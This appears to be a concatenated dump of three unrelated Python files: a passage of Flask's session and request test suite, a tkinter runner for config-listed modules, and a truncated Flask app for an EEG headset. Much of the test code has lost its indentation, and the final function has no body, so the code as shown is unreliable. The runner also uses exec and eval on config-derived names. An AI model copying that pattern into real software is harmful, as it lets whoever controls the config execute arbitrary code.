SECRET_KEY='foo',
SERVER_NAME='example.com:8080',
APPLICATION_ROOT='/foo'
)
@app.route('/')
def index():
flask.session['testing'] = 42
return 'Hello World'
rv = app.test_client().get('/', 'http://example.com:8080/foo')
self.assert_in('domain=example.com', rv.headers['set-cookie'].lower())
self.assert_in('path=/foo', rv.headers['set-cookie'].lower())
self.assert_in('httponly', rv.headers['set-cookie'].lower())
def test_session_using_application_root(self):
class PrefixPathMiddleware(object):
def __init__(self, app, prefix):
self.app = app
self.prefix = prefix
def __call__(self, environ, start_response):
environ['SCRIPT_NAME'] = self.prefix
return self.app(environ, start_response)
app = flask.Flask(__name__)
app.wsgi_app = PrefixPathMiddleware(app.wsgi_app, '/bar')
app.config.update(
SECRET_KEY='foo',
APPLICATION_ROOT='/bar'
)
@app.route('/')
def index():
flask.session['testing'] = 42
return 'Hello World'
rv = app.test_client().get('/', 'http://example.com:8080/')
self.assert_in('path=/bar', rv.headers['set-cookie'].lower())
def test_session_using_session_settings(self):
app = flask.Flask(__name__)
app.config.update(
SECRET_KEY='foo',
SERVER_NAME='www.example.com:8080',
APPLICATION_ROOT='/test',
SESSION_COOKIE_DOMAIN='.example.com',
SESSION_COOKIE_HTTPONLY=False,
SESSION_COOKIE_SECURE=True,
SESSION_COOKIE_PATH='/'
)
@app.route('/')
def index():
flask.session['testing'] = 42
return 'Hello World'
rv = app.test_client().get('/', 'http://www.example.com:8080/test/')
cookie = rv.headers['set-cookie'].lower()
self.assert_in('domain=.example.com', cookie)
self.assert_in('path=/', cookie)
self.assert_in('secure', cookie)
self.assert_not_in('httponly', cookie)
def test_missing_session(self):
app = flask.Flask(__name__)
def expect_exception(f, *args, **kwargs):
try:
f(*args, **kwargs)
except RuntimeError as e:
self.assert_true(e.args and 'session is unavailable' in e.args[0])
else:
self.assert_true(False, 'expected exception')
with app.test_request_context():
self.assert_true(flask.session.get('missing_key') is None)
expect_exception(flask.session.__setitem__, 'foo', 42)
expect_exception(flask.session.pop, 'foo')
def test_session_expiration(self):
    """Permanent sessions get an Expires cookie roughly
    PERMANENT_SESSION_LIFETIME in the future; non-permanent sessions get
    no Expires attribute at all."""
    permanent = True
    app = flask.Flask(__name__)
    app.secret_key = 'testkey'

    @app.route('/')
    def index():
        flask.session['test'] = 42
        flask.session.permanent = permanent
        return ''

    @app.route('/test')
    def test():
        return text_type(flask.session.permanent)

    client = app.test_client()
    rv = client.get('/')
    self.assert_in('set-cookie', rv.headers)
    # BUG FIX: the inline (?i) flag sat at the END of the pattern; inline
    # flags must appear at the start -- non-initial placement has been a
    # DeprecationWarning since Python 3.6 and a re.error since 3.11.
    match = re.search(r'(?i)\bexpires=([^;]+)', rv.headers['set-cookie'])
    expires = parse_date(match.group())
    expected = datetime.utcnow() + app.permanent_session_lifetime
    # Compare only to day granularity to tolerate request latency.
    self.assert_equal(expires.year, expected.year)
    self.assert_equal(expires.month, expected.month)
    self.assert_equal(expires.day, expected.day)
    rv = client.get('/test')
    self.assert_equal(rv.data, b'True')

    permanent = False
    rv = app.test_client().get('/')
    self.assert_in('set-cookie', rv.headers)
    match = re.search(r'\bexpires=([^;]+)', rv.headers['set-cookie'])
    self.assert_true(match is None)
def test_session_stored_last(self):
app = flask.Flask(__name__)
app.secret_key = 'development-key'
app.testing = True
@app.after_request
def modify_session(response):
flask.session['foo'] = 42
return response
@app.route('/')
def dump_session_contents():
return repr(flask.session.get('foo'))
c = app.test_client()
self.assert_equal(c.get('/').data, b'None')
self.assert_equal(c.get('/').data, b'42')
def test_session_special_types(self):
app = flask.Flask(__name__)
app.secret_key = 'development-key'
app.testing = True
now = datetime.utcnow().replace(microsecond=0)
the_uuid = uuid.uuid4()
@app.after_request
def modify_session(response):
flask.session['m'] = flask.Markup('Hello!')
flask.session['u'] = the_uuid
flask.session['dt'] = now
flask.session['t'] = (1, 2, 3)
return response
@app.route('/')
def dump_session_contents():
return pickle.dumps(dict(flask.session))
c = app.test_client()
c.get('/')
rv = pickle.loads(c.get('/').data)
self.assert_equal(rv['m'], flask.Markup('Hello!'))
self.assert_equal(type(rv['m']), flask.Markup)
self.assert_equal(rv['dt'], now)
self.assert_equal(rv['u'], the_uuid)
self.assert_equal(rv['t'], (1, 2, 3))
def test_flashes(self):
app = flask.Flask(__name__)
app.secret_key = 'testkey'
with app.test_request_context():
self.assert_false(flask.session.modified)
flask.flash('Zap')
flask.session.modified = False
flask.flash('Zip')
self.assert_true(flask.session.modified)
self.assert_equal(list(flask.get_flashed_messages()), ['Zap', 'Zip'])
def test_extended_flashing(self):
# Be sure app.testing=True below, else tests can fail silently.
#
# Specifically, if app.testing is not set to True, the AssertionErrors
# in the view functions will cause a 500 response to the test client
# instead of propagating exceptions.
app = flask.Flask(__name__)
app.secret_key = 'testkey'
app.testing = True
@app.route('/')
def index():
flask.flash(u'Hello World')
flask.flash(u'Hello World', 'error')
flask.flash(flask.Markup(u'<em>Testing</em>'), 'warning')
return ''
@app.route('/test/')
def test():
messages = flask.get_flashed_messages()
self.assert_equal(len(messages), 3)
self.assert_equal(messages[0], u'Hello World')
self.assert_equal(messages[1], u'Hello World')
self.assert_equal(messages[2], flask.Markup(u'<em>Testing</em>'))
return ''
@app.route('/test_with_categories/')
def test_with_categories():
messages = flask.get_flashed_messages(with_categories=True)
self.assert_equal(len(messages), 3)
self.assert_equal(messages[0], ('message', u'Hello World'))
self.assert_equal(messages[1], ('error', u'Hello World'))
self.assert_equal(messages[2], ('warning', flask.Markup(u'<em>Testing</em>')))
return ''
@app.route('/test_filter/')
def test_filter():
messages = flask.get_flashed_messages(category_filter=['message'], with_categories=True)
self.assert_equal(len(messages), 1)
self.assert_equal(messages[0], ('message', u'Hello World'))
return ''
@app.route('/test_filters/')
def test_filters():
messages = flask.get_flashed_messages(category_filter=['message', 'warning'], with_categories=True)
self.assert_equal(len(messages), 2)
self.assert_equal(messages[0], ('message', u'Hello World'))
self.assert_equal(messages[1], ('warning', flask.Markup(u'<em>Testing</em>')))
return ''
@app.route('/test_filters_without_returning_categories/')
def test_filters2():
messages = flask.get_flashed_messages(category_filter=['message', 'warning'])
self.assert_equal(len(messages), 2)
self.assert_equal(messages[0], u'Hello World')
self.assert_equal(messages[1], flask.Markup(u'<em>Testing</em>'))
return ''
# Create new test client on each test to clean flashed messages.
c = app.test_client()
c.get('/')
c.get('/test/')
c = app.test_client()
c.get('/')
c.get('/test_with_categories/')
c = app.test_client()
c.get('/')
c.get('/test_filter/')
c = app.test_client()
c.get('/')
c.get('/test_filters/')
c = app.test_client()
c.get('/')
c.get('/test_filters_without_returning_categories/')
def test_request_processing(self):
app = flask.Flask(__name__)
evts = []
@app.before_request
def before_request():
evts.append('before')
@app.after_request
def after_request(response):
response.data += b'|after'
evts.append('after')
return response
@app.route('/')
def index():
self.assert_in('before', evts)
self.assert_not_in('after', evts)
return 'request'
self.assert_not_in('after', evts)
rv = app.test_client().get('/').data
self.assert_in('after', evts)
self.assert_equal(rv, b'request|after')
def test_after_request_processing(self):
app = flask.Flask(__name__)
app.testing = True
@app.route('/')
def index():
@flask.after_this_request
def foo(response):
response.headers['X-Foo'] = 'a header'
return response
return 'Test'
c = app.test_client()
resp = c.get('/')
self.assertEqual(resp.status_code, 200)
self.assertEqual(resp.headers['X-Foo'], 'a header')
def test_teardown_request_handler(self):
called = []
app = flask.Flask(__name__)
@app.teardown_request
def teardown_request(exc):
called.append(True)
return "Ignored"
@app.route('/')
def root():
return "Response"
rv = app.test_client().get('/')
self.assert_equal(rv.status_code, 200)
self.assert_in(b'Response', rv.data)
self.assert_equal(len(called), 1)
def test_teardown_request_handler_debug_mode(self):
called = []
app = flask.Flask(__name__)
app.testing = True
@app.teardown_request
def teardown_request(exc):
called.append(True)
return "Ignored"
@app.route('/')
def root():
return "Response"
rv = app.test_client().get('/')
self.assert_equal(rv.status_code, 200)
self.assert_in(b'Response', rv.data)
self.assert_equal(len(called), 1)
def test_teardown_request_handler_error(self):
called = []
app = flask.Flask(__name__)
@app.teardown_request
def teardown_request1(exc):
self.assert_equal(type(exc), ZeroDivisionError)
called.append(True)
# This raises a new error and blows away sys.exc_info(), so we can
# test that all teardown_requests get passed the same original
# exception.
try:
raise TypeError()
except:
pass
@app.teardown_request
def teardown_request2(exc):
self.assert_equal(type(exc), ZeroDivisionError)
called.append(True)
# This raises a new error and blows away sys.exc_info(), so we can
# test that all teardown_requests get passed the same original
# exception.
try:
raise TypeError()
except:
pass
@app.route('/')
def fails():
1 // 0
rv = app.test_client().get('/')
self.assert_equal(rv.status_code, 500)
self.assert_in(b'Internal Server Error', rv.data)
self.assert_equal(len(called), 2)
def test_before_after_request_order(self):
called = []
app = flask.Flask(__name__)
@app.before_request
def before1():
called.append(1)
@app.before_request
def before2():
called.append(2)
@app.after_request
def after1(response):
called.append(4)
return response
@app.after_request
def after2(response):
called.append(3)
return response
@app.teardown_request
def finish1(exc):
called.append(6)
@app.teardown_request
def finish2(exc):
called.append(5)
@app.route('/')
def index():
return '42'
rv = app.test_client().get('/')
self.assert_equal(rv.data, b'42')
self.assert_equal(called, [1, 2, 3, 4, 5, 6])
def test_error_handling(self):
    """Registered error handlers replace the default 404/500 bodies."""
    app = flask.Flask(__name__)

    @app.errorhandler(404)
    def not_found(e):
        return 'not found', 404

    @app.errorhandler(500)
    def internal_server_error(e):
        return 'internal server error', 500

    @app.route('/')
    def index():
        flask.abort(404)

    @app.route('/error')
    def error():
        1 // 0

    client = app.test_client()
    response = client.get('/')
    self.assert_equal(response.status_code, 404)
    self.assert_equal(response.data, b'not found')
    response = client.get('/error')
    self.assert_equal(response.status_code, 500)
    self.assert_equal(b'internal server error', response.data)
def test_before_request_and_routing_errors(self):
app = flask.Flask(__name__)
@app.before_request
def attach_something():
flask.g.something = 'value'
@app.errorhandler(404)
def return_something(error):
return flask.g.something, 404
rv = app.test_client().get('/')
self.assert_equal(rv.status_code, 404)
self.assert_equal(rv.data, b'value')
def test_user_error_handling(self):
class MyException(Exception):
pass
app = flask.Flask(__name__)
@app.errorhandler(MyException)
def handle_my_exception(e):
self.assert_true(isinstance(e, MyException))
return '42'
@app.route('/')
def index():
raise MyException()
c = app.test_client()
self.assert_equal(c.get('/').data, b'42')
def test_trapping_of_bad_request_key_errors(self):
app = flask.Flask(__name__)
app.testing = True
@app.route('/fail')
def fail():
flask.request.form['missing_key']
c = app.test_client()
self.assert_equal(c.get('/fail').status_code, 400)
app.config['TRAP_BAD_REQUEST_ERRORS'] = True
c = app.test_client()
try:
c.get('/fail')
except KeyError as e:
self.assert_true(isinstance(e, BadRequest))
else:
self.fail('Expected exception')
def test_trapping_of_all_http_exceptions(self):
app = flask.Flask(__name__)
app.testing = True
app.config['TRAP_HTTP_EXCEPTIONS'] = True
@app.route('/fail')
def fail():
flask.abort(404)
c = app.test_client()
try:
c.get('/fail')
except NotFound as e:
pass
else:
self.fail('Expected exception')
def test_enctype_debug_helper(self):
from flask.debughelpers import DebugFilesKeyError
app = flask.Flask(__name__)
app.debug = True
@app.route('/fail', methods=['POST'])
def index():
return flask.request.files['foo'].filename
# with statement is important because we leave an exception on the
# stack otherwise and we want to ensure that this is not the case
# to not negatively affect other tests.
with app.test_client() as c:
try:
c.post('/fail', data={'foo': 'index.txt'})
except DebugFilesKeyError as e:
self.assert_in('no file contents were transmitted', str(e))
self.assert_in('This was submitted: "index.txt"', str(e))
else:
self.fail('Expected exception')
def test_response_creation(self):
app = flask.Flask(__name__)
@app.route('/unicode')
def from_unicode():
return u'Hällo Wörld'
@app.route('/string')
def from_string():
return u'Hällo Wörld'.encode('utf-8')
@app.route('/args')
def from_tuple():
return 'Meh', 400, {
'X-Foo': 'Testing',
'Content-Type': 'text/plain; charset=utf-8'
}
c = app.test_client()
self.assert_equal(c.get('/unicode').data, u'Hällo Wörld'.encode('utf-8'))
self.assert_equal(c.get('/string').data, u'Hällo Wörld'.encode('utf-8'))
rv = c.get('/args')
self.assert_equal(rv.data, b'Meh')
self.assert_equal(rv.headers['X-Foo'], 'Testing')
self.assert_equal(rv.status_code, 400)
self.assert_equal(rv.mimetype, 'text/plain')
def test_make_response(self):
app = flask.Flask(__name__)
with app.test_request_context():
rv = flask.make_response()
self.assert_equal(rv.status_code, 200)
self.assert_equal(rv.data, b'')
self.assert_equal(rv.mimetype, 'text/html')
rv = flask.make_response('Awesome')
self.assert_equal(rv.status_code, 200)
self.assert_equal(rv.data, b'Awesome')
self.assert_equal(rv.mimetype, 'text/html')
rv = flask.make_response('W00t', 404)
self.assert_equal(rv.status_code, 404)
self.assert_equal(rv.data, b'W00t')
self.assert_equal(rv.mimetype, 'text/html')
def test_make_response_with_response_instance(self):
app = flask.Flask(__name__)
with app.test_request_context():
rv = flask.make_response(
flask.jsonify({'msg': 'W00t'}), 400)
self.assertEqual(rv.status_code, 400)
self.assertEqual(rv.data, b'{\n "msg": "W00t"\n}')
self.assertEqual(rv.mimetype, 'application/json')
rv = flask.make_response(
flask.Response(''), 400)
self.assertEqual(rv.status_code, 400)
self.assertEqual(rv.data, b'')
self.assertEqual(rv.mimetype, 'text/html')
rv = flask.make_response(
flask.Response('', headers={'Content-Type': 'text/html'}),
400, [('X-Foo', 'bar')])
self.assertEqual(rv.status_code, 400)
self.assertEqual(rv.headers['Content-Type'], 'text/html')
self.assertEqual(rv.headers['X-Foo'], 'bar')
def test_url_generation(self):
app = flask.Flask(__name__)
@app.route('/hello/<name>', methods=['POST'])
def hello():
pass
with app.test_request_context():
self.assert_equal(flask.url_for('hello', name='test x'), '/hello/test%20x')
self.assert_equal(flask.url_for('hello', name='test x', _external=True),
'http://localhost/hello/test%20x')
def test_build_error_handler(self):
app = flask.Flask(__name__)
# Test base case, a URL which results in a BuildError.
with app.test_request_context():
self.assertRaises(BuildError, flask.url_for, 'spam')
# Verify the error is re-raised if not the current exception.
try:
with app.test_request_context():
flask.url_for('spam')
except BuildError as err:
error = err
try:
raise RuntimeError('Test case where BuildError is not current.')
except RuntimeError:
self.assertRaises(BuildError, app.handle_url_build_error, error, 'spam', {})
# Test a custom handler.
def handler(error, endpoint, values):
# Just a test.
return '/test_handler/'
app.url_build_error_handlers.append(handler)
with app.test_request_context():
self.assert_equal(flask.url_for('spam'), '/test_handler/')
def test_custom_converters(self):
from werkzeug.routing import BaseConverter
class ListConverter(BaseConverter):
def to_python(self, value):
return value.split(',')
def to_url(self, value):
base_to_url = super(ListConverter, self).to_url
return ','.join(base_to_url(x) for x in value)
app = flask.Flask(__name__)
app.url_map.converters['list'] = ListConverter
@app.route('/<list:args>')
def index(args):
return '|'.join(args)
c = app.test_client()
self.assert_equal(c.get('/1,2,3').data, b'1|2|3')
def test_static_files(self):
app = flask.Flask(__name__)
app.testing = True
rv = app.test_client().get('/static/index.html')
self.assert_equal(rv.status_code, 200)
self.assert_equal(rv.data.strip(), b'<h1>Hello World!</h1>')
with app.test_request_context():
self.assert_equal(flask.url_for('static', filename='index.html'),
'/static/index.html')
rv.close()
def test_none_response(self):
    """A view returning None must raise ValueError with a precise message."""
    app = flask.Flask(__name__)

    @app.route('/')
    def test():
        return None

    try:
        app.test_client().get('/')
    except ValueError as e:
        self.assert_equal(str(e), 'View function did not return a response')
    else:
        # BUG FIX: this branch used self.assert_true("Expected ValueError"),
        # which always passes because a non-empty string is truthy. fail()
        # correctly reports the missing exception.
        self.fail('Expected ValueError')
def test_request_locals(self):
self.assert_equal(repr(flask.g), '<LocalProxy unbound>')
self.assertFalse(flask.g)
def test_test_app_proper_environ(self):
app = flask.Flask(__name__)
app.config.update(
SERVER_NAME='localhost.localdomain:5000'
)
@app.route('/')
def index():
return 'Foo'
@app.route('/', subdomain='foo')
def subdomain():
return 'Foo SubDomain'
rv = app.test_client().get('/')
self.assert_equal(rv.data, b'Foo')
rv = app.test_client().get('/', 'http://localhost.localdomain:5000')
self.assert_equal(rv.data, b'Foo')
rv = app.test_client().get('/', 'https://localhost.localdomain:5000')
self.assert_equal(rv.data, b'Foo')
app.config.update(SERVER_NAME='localhost.localdomain')
rv = app.test_client().get('/', 'https://localhost.localdomain')
self.assert_equal(rv.data, b'Foo')
try:
app.config.update(SERVER_NAME='localhost.localdomain:443')
rv = app.test_client().get('/', 'https://localhost.localdomain')
# Werkzeug 0.8
self.assert_equal(rv.status_code, 404)
except ValueError as e:
# Werkzeug 0.7
self.assert_equal(str(e), "the server name provided " +
"('localhost.localdomain:443') does not match the " + \
"server name from the WSGI environment ('localhost.localdomain')")
try:
app.config.update(SERVER_NAME='localhost.localdomain')
rv = app.test_client().get('/', 'http://foo.localhost')
# Werkzeug 0.8
self.assert_equal(rv.status_code, 404)
except ValueError as e:
# Werkzeug 0.7
self.assert_equal(str(e), "the server name provided " + \
"('localhost.localdomain') does not match the " + \
"server name from the WSGI environment ('foo.localhost')")
rv = app.test_client().get('/', 'http://foo.localhost.localdomain')
self.assert_equal(rv.data, b'Foo SubDomain')
def test_exception_propagation(self):
    """TESTING / PROPAGATE_EXCEPTIONS / DEBUG make view errors propagate to
    the test client; without them the client sees a 500 response."""

    # BUG FIX: the parameter was spelled `configkey` while the body read
    # `config_key`, so the argument passed to each Thread was silently
    # ignored and the body resolved `config_key` via the closure over the
    # loop variable below. The spellings now match, so the thread argument
    # is actually used.
    def apprunner(config_key):
        app = flask.Flask(__name__)

        @app.route('/')
        def index():
            1 // 0

        c = app.test_client()
        if config_key is not None:
            app.config[config_key] = True
            try:
                resp = c.get('/')
            except Exception:
                pass
            else:
                self.fail('expected exception')
        else:
            self.assert_equal(c.get('/').status_code, 500)

    # we have to run this test in an isolated thread because if the
    # debug flag is set to true and an exception happens the context is
    # not torn down. This causes other tests that run after this fail
    # when they expect no exception on the stack.
    for config_key in 'TESTING', 'PROPAGATE_EXCEPTIONS', 'DEBUG', None:
        t = Thread(target=apprunner, args=(config_key,))
        t.start()
        t.join()
def test_max_content_length(self):
app = flask.Flask(__name__)
app.config['MAX_CONTENT_LENGTH'] = 64
@app.before_request
def always_first():
flask.request.form['myfile']
self.assert_true(False)
@app.route('/accept', methods=['POST'])
def accept_file():
flask.request.form['myfile']
self.assert_true(False)
@app.errorhandler(413)
def catcher(error):
return '42'
c = app.test_client()
rv = c.post('/accept', data={'myfile': 'foo' * 100})
self.assert_equal(rv.data, b'42')
def test_url_processors(self):
app = flask.Flask(__name__)
@app.url_defaults
def add_language_code(endpoint, values):
if flask.g.lang_code is not None and \
app.url_map.is_endpoint_expecting(endpoint, 'lang_code'):
values.setdefault('lang_code', flask.g.lang_code)
@app.url_value_preprocessor
def pull_lang_code(endpoint, values):
flask.g.lang_code = values.pop('lang_code', None)
@app.route('/<lang_code>/')
def index():
return flask.url_for('about')
@app.route('/<lang_code>/about')
def about():
return flask.url_for('something_else')
@app.route('/foo')
def something_else():
return flask.url_for('about', lang_code='en')
c = app.test_client()
self.assert_equal(c.get('/de/').data, b'/de/about')
self.assert_equal(c.get('/de/about').data, b'/foo')
self.assert_equal(c.get('/foo').data, b'/en/about')
def test_inject_blueprint_url_defaults(self):
app = flask.Flask(__name__)
bp = flask.Blueprint('foo.bar.baz', __name__,
template_folder='template')
@bp.url_defaults
def bp_defaults(endpoint, values):
values['page'] = 'login'
@bp.route('/<page>')
def view(page): pass
app.register_blueprint(bp)
values = dict()
app.inject_url_defaults('foo.bar.baz.view', values)
expected = dict(page='login')
self.assert_equal(values, expected)
with app.test_request_context('/somepage'):
url = flask.url_for('foo.bar.baz.view')
expected = '/login'
self.assert_equal(url, expected)
def test_nonascii_pathinfo(self):
app = flask.Flask(__name__)
app.testing = True
@app.route(u'/киртест')
def index():
return 'Hello World!'
c = app.test_client()
rv = c.get(u'/киртест')
self.assert_equal(rv.data, b'Hello World!')
def test_debug_mode_complains_after_first_request(self):
app = flask.Flask(__name__)
app.debug = True
@app.route('/')
def index():
return 'Awesome'
self.assert_false(app.got_first_request)
self.assert_equal(app.test_client().get('/').data, b'Awesome')
try:
@app.route('/foo')
def broken():
return 'Meh'
except AssertionError as e:
self.assert_in('A setup function was called', str(e))
else:
self.fail('Expected exception')
app.debug = False
@app.route('/foo')
def working():
return 'Meh'
self.assert_equal(app.test_client().get('/foo').data, b'Meh')
self.assert_true(app.got_first_request)
def test_before_first_request_functions(self):
got = []
app = flask.Flask(__name__)
@app.before_first_request
def foo():
got.append(42)
c = app.test_client()
c.get('/')
self.assert_equal(got, [42])
c.get('/')
self.assert_equal(got, [42])
self.assert_true(app.got_first_request)
def test_routing_redirect_debugging(self):
app = flask.Flask(__name__)
app.debug = True
@app.route('/foo/', methods=['GET', 'POST'])
def foo():
return 'success'
with app.test_client() as c:
try:
c.post('/foo', data={})
except AssertionError as e:
self.assert_in('http://localhost/foo/', str(e))
self.assert_in('Make sure to directly send your POST-request '
'to this URL', str(e))
else:
self.fail('Expected exception')
rv = c.get('/foo', data={}, follow_redirects=True)
self.assert_equal(rv.data, b'success')
app.debug = False
with app.test_client() as c:
rv = c.post('/foo', data={}, follow_redirects=True)
self.assert_equal(rv.data, b'success')
def test_route_decorator_custom_endpoint(self):
app = flask.Flask(__name__)
app.debug = True
@app.route('/foo/')
def foo():
return flask.request.endpoint
@app.route('/bar/', endpoint='bar')
def for_bar():
return flask.request.endpoint
@app.route('/bar/123', endpoint='123')
def for_bar_foo():
return flask.request.endpoint
with app.test_request_context():
assert flask.url_for('foo') == '/foo/'
assert flask.url_for('bar') == '/bar/'
assert flask.url_for('123') == '/bar/123'
c = app.test_client()
self.assertEqual(c.get('/foo/').data, b'foo')
self.assertEqual(c.get('/bar/').data, b'bar')
self.assertEqual(c.get('/bar/123').data, b'123')
def test_preserve_only_once(self):
app = flask.Flask(__name__)
app.debug = True
@app.route('/fail')
def fail_func():
1 // 0
c = app.test_client()
for x in range(3):
with self.assert_raises(ZeroDivisionError):
c.get('/fail')
self.assert_true(flask._request_ctx_stack.top is not None)
self.assert_true(flask._app_ctx_stack.top is not None)
# implicit appctx disappears too
flask._request_ctx_stack.top.pop()
self.assert_true(flask._request_ctx_stack.top is None)
self.assert_true(flask._app_ctx_stack.top is None)
def test_preserve_remembers_exception(self):
app = flask.Flask(__name__)
app.debug = True
errors = []
@app.route('/fail')
def fail_func():
1 // 0
@app.route('/success')
def success_func():
return 'Okay'
@app.teardown_request
def teardown_handler(exc):
errors.append(exc)
c = app.test_client()
# After this failure we did not yet call the teardown handler
with self.assert_raises(ZeroDivisionError):
c.get('/fail')
self.assert_equal(errors, [])
# But this request triggers it, and it's an error
c.get('/success')
self.assert_equal(len(errors), 2)
self.assert_true(isinstance(errors[0], ZeroDivisionError))
# At this point another request does nothing.
c.get('/success')
self.assert_equal(len(errors), 3)
self.assert_equal(errors[1], None)
def test_get_method_on_g(self):
    """``flask.g.get`` mirrors ``dict.get``: default on a miss, value on a hit."""
    app = flask.Flask(__name__)
    app.testing = True
    with app.app_context():
        # Missing attribute: None by default, or the supplied fallback.
        self.assert_equal(flask.g.get('x'), None)
        self.assert_equal(flask.g.get('x', 11), 11)
        # Once set, both attribute access and get() observe the value.
        flask.g.x = 42
        for observed in (flask.g.get('x'), flask.g.x):
            self.assert_equal(observed, 42)
def test_g_iteration_protocol(self):
    """``flask.g`` supports ``in`` tests and iteration over attribute names."""
    app = flask.Flask(__name__)
    app.testing = True
    with app.app_context():
        for attribute, value in (('foo', 23), ('bar', 42)):
            setattr(flask.g, attribute, value)
        self.assert_equal('foo' in flask.g, True)
        self.assert_equal('foos' in flask.g, False)
        self.assert_equal(sorted(flask.g), ['bar', 'foo'])
class SubdomainTestCase(FlaskTestCase):
def test_basic_support(self):
    """Routes with and without a subdomain dispatch on the request's Host."""
    app = flask.Flask(__name__)
    app.config['SERVER_NAME'] = 'localhost'

    @app.route('/')
    def normal_index():
        return 'normal index'

    @app.route('/', subdomain='test')
    def test_index():
        return 'test index'

    client = app.test_client()
    for base_url, expected in (('http://localhost/', b'normal index'),
                               ('http://test.localhost/', b'test index')):
        response = client.get('/', base_url)
        self.assert_equal(response.data, expected)
@emits_module_deprecation_warning
def test_module_static_path_subdomain(self):
app = flask.Flask(__name__)
app.config['SERVER_NAME'] = 'example.com'
from subdomaintestmodule import mod
app.register_module(mod)
c = app.test_client()
rv = c.get('/static/hello.txt', 'http://foo.example.com/')
rv.direct_passthrough = False
self.assert_equal(rv.data.strip(), b'Hello Subdomain')
rv.close()
def test_subdomain_matching(self):
app = flask.Flask(__name__)
app.config['SERVER_NAME'] = 'localhost'
@app.route('/', subdomain='<user>')
def index(user):
return 'index for %s' % user
c = app.test_client()
rv = c.get('/', 'http://mitsuhiko.localhost/')
self.assert_equal(rv.data, b'index for mitsuhiko')
def test_subdomain_matching_with_ports(self):
app = flask.Flask(__name__)
app.config['SERVER_NAME'] = 'localhost:3000'
@app.route('/', subdomain='<user>')
def index(user):
return 'index for %s' % user
c = app.test_client()
rv = c.get('/', 'http://mitsuhiko.localhost:3000/')
self.assert_equal(rv.data, b'index for mitsuhiko')
@emits_module_deprecation_warning
def test_module_subdomain_support(self):
app = flask.Flask(__name__)
mod = flask.Module(__name__, 'test', subdomain='testing')
app.config['SERVER_NAME'] = 'localhost'
@mod.route('/test')
def test():
return 'Test'
@mod.route('/outside', subdomain='xtesting')
def bar():
return 'Outside'
app.register_module(mod)
c = app.test_client()
rv = c.get('/test', 'http://testing.localhost/')
self.assert_equal(rv.data, b'Test')
rv = c.get('/outside', 'http://xtesting.localhost/')
self.assert_equal(rv.data, b'Outside')
def suite():
    """Assemble and return the unittest suite for this module."""
    result = unittest.TestSuite()
    for case in (BasicFunctionalityTestCase, SubdomainTestCase):
        result.addTest(unittest.makeSuite(case))
    return result
|
main.py | from tkinter import Tk, Button, Label
from threading import Thread
from queue import Queue
import configparser
import sys
import os
def init_config(path):
    # Load the INI file at *path* into the module-level ``config`` parser.
    # optionxform=str keeps option-name case intact, because module names
    # are later used verbatim as import targets and tt keys.
    config.optionxform = str
    config.read(path)
def maingui():
    # Periodic GUI refresh: for each configured module show its message
    # counter and colour the label lime while 'is_working' is set, white
    # otherwise.  Re-schedules itself every second via Tk's event loop.
    # NOTE(review): assumes the MODULES section was loaded into
    # tt['modules'] and each module entry got a 'label' widget at startup.
    for name in tt['modules'].keys():
        tt[name]['label'].config(text=str(tt[name].get('cnt', 0)),
                                 bg=('lime' if (tt[name].get('is_working', False)) else 'white'))
    root.after(1000, maingui)
def rstart(name):
    # (Re-)enable the module's run flag, then launch its worker thread.
    if not tt[name].get('is_enable', True):
        # Previously stopped (flag present and False) -> flip back on.
        tt[name].update({'is_enable': True})
    elif not tt[name].get('is_enable', False):
        # First start: no flag recorded yet.
        tt[name].update({'is_enable': True})
    # NOTE(review): eval(name) resolves the worker imported at startup from
    # the settings file; a dict of callables would avoid eval on
    # config-derived input — the settings file must be trusted.
    # NOTE(review): a fresh daemon thread is started on every call, so
    # pressing "Start" on an already-running module appears to spawn a
    # duplicate worker — confirm intended.
    thread = Thread(target=eval(name), args=(tt,))
    thread.daemon = True
    thread.start()
def rstop(name):
    # Ask the module's worker to stop by clearing its enable flag; the
    # worker thread is expected to poll 'is_enable' and exit on its own.
    if tt[name].get('is_enable', False):
        tt[name].update({'is_enable': False})
if __name__ == '__main__':
    root = Tk()
    root.geometry('+200+200')
    root.overrideredirect(0)
    # uncomment for minimize
    # root.iconify()
    tt = {}        # shared state: one dict entry per INI section / module
    modules = []   # [name, autostart] pairs from the MODULES section
    # Settings file: default ./settings.ini, or the first CLI argument.
    if len(sys.argv) < 2:
        path = './settings.ini'
    else:
        print(sys.argv[1])
        path = './%s' % (sys.argv[1])
    if not os.path.exists(path):
        print('Settings file %s not found' % (path))
        sys.exit()
    config = configparser.ConfigParser()
    init_config(path)
    # Mirror every INI section into tt (keys lower-cased); the MODULES
    # section additionally drives dynamic imports of the worker functions.
    for section in config.sections():
        tt.update({section.lower(): dict(config[section])})
        if section == 'MODULES':
            for key in config[section]:
                modules.append([key, config[section][key]])
                # NOTE(review): exec on config-derived names — the settings
                # file must be trusted.
                exec('from modules.%s import %s' % (key, key))
    # Give each module its message queue and counter.
    for [name, autostart] in modules:
        module = tt.get(name, {})
        q = Queue()
        module.update({'queue': q})
        module.update({'cnt': 0})
        tt.update({name: module})
    # Build one GUI row (name, Start, Stop, counter label) per module.
    for i, [name, autostart] in enumerate(modules):
        module = tt.get(name, {})
        Label(text=name).grid(row=i, column=0)
        Button(text="Start", command=lambda x=name: rstart(x)).grid(row=i, column=1)
        Button(text="Stop", command=lambda x=name: rstop(x)).grid(row=i, column=2)
        label = Label(root, bg='white', text='0')
        label.grid(row=i, column=3)
        module.update({'label': label})
        tt.update({name: module})
        # NOTE(review): autostart is the raw INI string, so any non-empty
        # value (including "0"/"false") is truthy here — confirm intended.
        if autostart:
            rstart(name)
    root.after(100, maingui)
    root.mainloop()
|
app.py | #!/usr/local/bin/python
import sys
import flaskwebgui
from flask import *
import read_mindwave_mobile
import threading
import att_model , lowa_model , lowb_model
import matplotlib.pyplot as plt
# Module-level Flask application and the desktop-window wrapper around it.
app = Flask(__name__)
ui = flaskwebgui.FlaskUI(app)
class datapackMW:
    # Accumulators for the EEG band samples copied from
    # read_mindwave_mobile once a measurement finishes (see /result).
    # Class-level lists on purpose: state is shared across requests.
    Delta = []
    Theta = []
    LowAlpha = []
    HighAlpha = []
    LowBeta = []
    HighBeta = []
    LowGamma = []
    MedGamma = []
    AttentionLevel = []
    PoorSignalLevel = []
    Unknowdatapoint = []
    MeditationLevel = []
def print_end():
    """Log that a measurement run has finished."""
    print('end')
def render_measure():
    """Kick off a headset measurement in the background and show the page.

    Bug fix: the original called ``Thread.run()``, which executes the
    target synchronously in the request thread (no new thread is ever
    started), blocking the response until the measurement ends.
    ``Thread.start()`` runs it in the background, matching the other
    measurement endpoints.
    """
